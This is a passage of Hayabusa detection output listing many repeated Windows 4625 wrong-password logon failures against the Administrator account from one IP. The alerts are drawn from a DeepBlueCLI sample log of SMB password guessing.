EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:19.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.036 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.125 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.858 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:20.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.331 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.369 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.401 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.445 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.535 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.622 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.715 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:21.986 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.172 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.221 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.265 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.307 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.741 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.781 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:22.971 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.220 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:23.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong 